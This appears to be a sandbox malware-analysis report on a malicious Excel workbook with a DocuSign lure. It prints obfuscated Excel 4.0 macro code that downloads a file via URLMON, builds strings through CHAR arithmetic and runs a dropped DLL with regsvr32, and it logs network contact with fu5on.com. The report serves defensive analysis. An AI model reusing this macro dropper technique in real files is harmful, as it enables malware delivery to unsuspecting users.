                                                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.367004077607
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.25260634675
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326317
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:326317
                                                                                                                                                                                              Entropy:7.65589543371
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                                                              CALL("Ke"&????2!IE349&"32", "Cr"&????2!IG377&"yA", "JCJ", ????2!HV347&????2!HV362, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              CALL("U"&????2!IG367, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HV347&????2!HV362&????2!HV376, 0, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!IE349&""32"",""Cr""&????2!IG377&""yA"",""JCJ"",????2!HV347&????2!HV362,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                              "=CALL(""Ke""&????2!IE349&""32"",""Cr""&????2!IG377&""yA"",""JCJ"",????2!HV347,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                                                                                                                                                                              "=CALL(""U""&????2!IG367,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HV347&????2!HV362&????2!HV376,0,0)"=EXEC(????3!W36&????2!HV347&????2!HV362&????2!HV376)=HALT()

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 04:11:35.057495117 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.188730001 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:35.188841105 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.189826012 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.319106102 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:35.322094917 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:35.322139978 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:35.322163105 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:35.322283030 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.322338104 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.334971905 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.464605093 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:35.464823961 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.465523005 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:35.633904934 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425019026 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425088882 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425136089 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425164938 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425200939 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425237894 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425270081 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425306082 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425343037 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425379038 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.425687075 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.431236029 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.431284904 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554702044 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554769039 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554812908 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554852962 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554894924 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554905891 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.554948092 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.555027008 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.555042982 CET49727443192.168.2.367.212.179.162
                                                                                                                                                                                              Nov 29, 2020 04:11:38.560138941 CET4434972767.212.179.162192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.560343027 CET49727443192.168.2.367.212.179.162

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 04:11:17.040965080 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:17.068289995 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:17.695233107 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:17.731081963 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:18.422483921 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:18.449469090 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:19.134962082 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:19.162138939 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:20.139287949 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:20.166182995 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:20.993854046 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:21.020991087 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:21.836072922 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:21.863251925 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:22.562308073 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:22.589546919 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:23.296447039 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:23.323738098 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:24.571537971 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:24.607135057 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:29.412024975 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:29.439390898 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:30.374480009 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:30.411803961 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:30.791141033 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:30.830338001 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:31.805041075 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:31.841120958 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:32.817656040 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:32.853477001 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:34.822767973 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:34.858381033 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:34.907048941 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:35.055612087 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:38.833645105 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:38.869149923 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:44.334655046 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:44.362035990 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:11:51.737761021 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:11:51.775012016 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:12:00.199516058 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:12:00.243565083 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:12:07.514205933 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:12:07.541361094 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:12:19.310611963 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:12:19.337636948 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:12:22.438508987 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:12:22.475620985 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:12:53.961244106 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:12:53.988511086 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:12:55.458950996 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:12:55.496804953 CET53649388.8.8.8192.168.2.3

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Nov 29, 2020 04:11:34.907048941 CET192.168.2.38.8.8.80x7092Standard query (0)fu5on.comA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Nov 29, 2020 04:11:35.055612087 CET8.8.8.8192.168.2.30x7092No error (0)fu5on.com67.212.179.162A (IP address)IN (0x0001)

                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                              Nov 29, 2020 04:11:35.322139978 CET67.212.179.162443192.168.2.349727CN=fu5on.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Nov 09 01:37:15 CET 2020 Thu Mar 17 17:40:46 CET 2016Sun Feb 07 01:37:15 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                              CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:04:11:28
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:04:11:37
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >